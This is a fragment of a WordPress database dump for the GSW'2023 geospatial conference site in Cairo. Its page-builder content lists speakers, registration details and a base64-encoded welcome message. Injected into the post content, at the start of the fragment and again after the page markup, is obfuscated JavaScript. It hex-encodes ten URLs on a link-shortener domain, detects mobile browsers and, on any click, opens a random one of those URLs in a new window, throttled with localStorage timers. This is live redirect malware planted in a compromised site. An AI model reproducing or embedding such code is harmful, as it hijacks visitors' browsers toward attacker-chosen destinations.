6\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','','','draft','closed','closed','','','','','2022-10-06 20:37:28','2022-10-06 20:37:28','',0,'https://gsw2023.com/?post_type=vc_grid_item&#038;p=2334',0,'vc_grid_item','',0),
(2339,1,'2022-10-06 21:14:53','2022-10-06 21:14:53','<p>[vc_row equal_height=\"yes\" content_placement=\"middle\" type=\"vc_default\" margin_top=\"5\" margin_bottom=\"10\" css=\".vc_custom_1529515723794{padding-top: 70px !important;padding-bottom: 55px !important;}\"][vc_column parallax=\"content-moving\" offset=\"vc_col-lg-offset-2 vc_col-lg-8 vc_col-md-offset-1 vc_col-md-10\"][ultimate_heading main_heading=\"Egypt GSW\'2023 -The First Geospatial Week in Africa and The Middle East\" sub_heading_color=\"#333333\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"150\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:70px;\"][/ultimate_heading][vc_row_inner css=\".vc_custom_1664994478914{margin-left: 0px !important;border-left-width: 0px !important;padding-left: 0px !important;}\"][vc_column_inner width=\"5/12\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2271|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-ismael-1.png|caption^null|alt^null|title^dr-ismael|description^null\" img_width=\"100\" title=\"Prof. Ismail AbdelGhafar\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fweb-application-development%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6><strong>President Arab Academy for Science, Technology and Maritime Transport</strong></h6>\n<p>[/bsf-info-box][/vc_column_inner][vc_column_inner width=\"1/3\"][bsf-info-box icon_type=\"custom\" icon_img=\"id^2272|url^https://gsw2023.com/wp-content/uploads/2022/10/dr-naser.jpg|caption^null|alt^null|title^dr-naser|description^null\" img_width=\"100\" icon_style=\"advanced\" icon_border_spacing=\"100\" title=\"Prof. Naser El-Sheimy\" heading_tag=\"h5\" read_more=\"box\" link=\"url:%2Fsoftware-company%2Fservices%2Fsoftware-dedicated-team%2F|||\" hover_effect=\"style_2\" pos=\"top\" el_class=\"accent-icon-bg\" title_font_size=\"desktop:22px;\" title_font_line_height=\"desktop:32px;\"]</p>\n<h6>Geospatial Week Director ,The University of Calgary</h6>\n<p>[/bsf-info-box][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_raw_html]JTNDcCUyMHN0eWxlJTNEJTIydGV4dC1hbGlnbiUzQWp1c3RpZnklM0IlMjBjb2xvciUzQWJsYWNrJTNCJTIyJTNFQXMlMjB3ZSUyMGNlbGVicmF0ZSUyMG91ciUyMDUwdGglMjBhbm5pdmVyc2FyeSUyQyUyMHRoZSUyMEFyYWIlMjBBY2FkZW15JTIwZm9yJTIwU2NpZW5jZSUyQyUyMFRlY2hub2xvZ3klMkMlMjBhbmQlMjBNYXJpdGltZSUyMFRyYW5zcG9ydCUyMCUyOEFBU1RNVCUyOSUyMGlzJTIwaG9ub3JlZCUyMHRvJTIwaG9zdCUyMHRoZSUyMElTUFJTJTIwZmlyc3QlMjBHZW9zcGF0aWFsJTIwV2VlayUyMGluJTIwQWZyaWNhJTIwYW5kJTIwTWlkZGxlJTIwRWFzdCUyMGluJTIwMjAyMyUyMCUyOEdTVy0yMDIzJTI5JTIwdGhhdCUyMHdpbGwlMjBiZSUyMGhlbGQlMjB1bmRlciUyMHRoZSUyMGF1c3BpY2VzJTIwb2YlMjBILkUlMjBTZWNyZXRhcnktR2VuZXJhbCUyMG9mJTIwdGhlJTIwTGVhZ3VlJTIwb2YlMjBBcmFiJTIwU3RhdGVzLiUyMFRoZSUyMGNvbmZlcmVuY2UlMjB3aWxsJTIwYmUlMjBoZWxkJTIwaW4lMjBTZXB0ZW1iZXIlMjAyMDIzJTJDJTIwYXQlMjB0aGUlMjBJbnRlckNvbnRpbmVudGFsJTIwQ2Fpcm8lMjBDaXR5JTIwc3RhcnMlMjBDYWlybyUyQyUyMEVneXB0LiUyMEFBU1RNVCUyMHN0cm9uZ2x5JTIwYmVsaWV2ZXMlMjB0aGF0JTIwc2NpZW5jZSUyMGlzJTIwdGhlJTIwa2V5JTIwdG8lMjB0aGUlMjBmdXR1cmUlMjBhbmQlMjB0aGUlMjBjb3JuZXJzdG9uZSUyMGZvciUyMG5hdGlvbnMlMjclMjBwcm9ncmVzcyUyMGFuZCUyMHByb3NwZXJpdHkuJTIwSXQlMjBpcyUyMHRoZSUyMHByaW1hcnklMjBmYWN0b3IlMjBmb3IlMjBodW1hbiUyMGFjaGlldmVtZW50cyUyMHRocm91Z2hvdXQlMjBhbGwlMjBhZ2VzLiUyMEFBU1RNVCUyMGhhcyUyMGElMjBob3N0JTIwb2YlMjBxdWFsaWZpZWQlMjBwcm9mZXNzb3JzJTIwYW5kJTIwZXhwZXJ0cyUyMHdobyUyMGFyZSUyMGNhcGFibGUlMjBvZiUyMHN1cHBvcnRpbmclMjBBcmFiJTIwYW5kJTIwQWZyaWNhbiUyMGNvdW50cmllcyUyMGluJTIwdmFyaW91cyUyMHNjaWVudGlmaWMlMjBmaWVsZHMuJTIwVGhlJTIwR1NXJTIwd2lsbCUyMHByb3ZpZGUlMjBhJTIwcGxhdGZvcm0lMjBmb3IlMjBpbnRlcm5hdGlvbmFsJTIwc2Nob2xhcnMlMkMlMjBncmFkdWF0ZSUyMHN0dWRlbnRzJTJDJTIwZnV0dXJlJTIwc2NpZW50aXN0cyUyMGFuZCUyMGluZHVzdHJpYWwlMjBzZWN0b3JzJTIwdG8lMjBsZWFybiUyMGV4Y2hhbmdlJTIwa25vd2xlZGdlJTIwYW5kJTIwZXhwZXJpZW5jZXMlMjBvZiUyMGFwcGx5aW5nJTIwZ2Vvc3BhdGlhbCUyMHRlY2hub2xvZ2llcyUyMGZvciUyMHN1c3RhaW5hYmxlJTIwZGV2ZWxvcG1lbnQlMjBmb3IlMjBiZXR0ZXIlMjBxdWFsaXR5JTIwb2YlMjBsaWZlJTIwZm9yJTIwcGVvcGxlJTIwYXJvdW5kJTIwdGhlJTIwd29ybGQuJTIwV2UlMjB3b3VsZCUyMGxpa2UlMjB0byUyMHRha2UlMjB0aGlzJTIwb3Bwb3J0dW5pdHklMjB0byUyMHdlbGNvbWUlMjB5b3UlMjB0byUyMENhaXJvJTIwYSUyMHZpYnJhbnQlMkMlMjBleGhpbGFyYXRpbmclMkMlMjBleG90aWMlMkMlMjBmYXNjaW5hdGluZyUyMGFuZCUyMHdlbGNvbWluZyUyMGNpdHkuJTIwSG9tZSUyMHRvJTIwdGhlJTIwYmVzdCUyMFBoYXJhb25pYyUyQyUyMENvcHRpYyUyMGFuZCUyMElzbGFtaWMlMjBzaWdodHMlMjBpbiUyMEVneXB0LiUyMENhaXJvJTIwaXMlMjB3aGVyZSUyMHlvdSUyMG5ldmVyJTIwa25vdyUyMHdoYXQlMjBpbmNyZWRpYmxlJTJDJTIwaGFsZi1mb3Jnb3R0ZW4lMjBtb251bWVudCUyMHlvdSUyMG1pZ2h0JTIwc3R1bWJsZSUyMGFjcm9zcyUyMHdoaWxlJTIwd2FuZGVyaW5nJTIwYXJvdW5kLiUyMEVuam95JTIwdGhlJTIwTmlsZSUyMHZpZXclMkMlMjB2aXNpdCUyMHRoZSUyMGdyZWF0JTIwcHlyYW1pZHMlMjBvZiUyMEdpemElMkMlMjB3YWxrJTIwdGhyb3VnaCUyMHRoZSUyMGNhcGl0YWwlMjdzJTIwbWVkaWV2YWwlMjBtYXJrZXRzJTIwYnklMjBLaGFuJTIwRWwtS2hhbGlsaSUyQyUyMG9yJTIwd2FsayUyMGRvd24lMjB0aGUlMjBOaWxlJTIwcHJvbWVuYWRlLiUyMFdlJTIwbG9vayUyMGZvcndhcmQlMjB0byUyMHdvcmtpbmclMjB3aXRoJTIwdGhlJTIwSVNQUlMlMjBjb3VuY2lsJTJDJTIwY29tbWlzc2lvbnMlMjBwcmVzaWRlbnRzJTJDJTIwd29ya2luZyUyMGdyb3VwJTIwb2ZmaWNlcnMlMkMlMjBhbmQlMjBvdGhlciUyMHNpc3RlciUyMG9yZ2FuaXphdGlvbnMlMjB0byUyMGhhdmUlMjBhJTIwc3VjY2Vzc2Z1bCUyMHRlY2huaWNhbCUyMHByb2dyYW0lMjBhbmQlMjBhJTIwbWVtb3JhYmxlJTIwc29jaWFsJTIwcHJvZ3JhbS4lMjBJdCUyMGlzJTIwZ3JlYXQlMjB0byUyMGhhdmUlMjB0aGUlMjBHU1clMjBjb21pbmclMjB0byUyMEVneXB0JTIwd2hlcmUlMjBtb3N0JTIwcHJvYmFibHklMjB0aGUlMjBmaXJzdCUyMG1hcHBpbmclMjBzeXN0ZW1zJTIwd2VyZSUyMGRldmVsb3BlZCUyMDEwMDBzJTIweWVhcnMlMjBhZ28uJTIwV2VsY29tZSUyMHRvJTIwR1NXJTI3MjAyMyUyMGluJTIwQ2Fpcm8lMkMlMjBFZ3lwdC4lM0MlMkZwJTNF[/vc_raw_html][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^1900|url^https://gsw2023.com/wp-content/uploads/2018/06/trade10.jpg|caption^null|alt^null|title^trade10|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1529568771974{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\" margin_design_tab_text=\"\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:%2Fsoftware-company%2Fshowcase%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665117715892{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:%2Fsoftware-company%2Fcontact%2F|||\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1529527073081{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665123014762{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #3098E3), color-stop(54%, #6FA1D4), color-stop(81%, #488CBD), color-stop(95%, #3298CF));background: -moz-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -webkit-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -o-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: -ms-linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);background: linear-gradient(left,#3098E3 10%,#6FA1D4 54%,#488CBD 81%,#3298CF 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023 By\" main_heading_color=\"#ecf404\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" margin_design_tab_text=\"\"][/ultimate_heading][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v 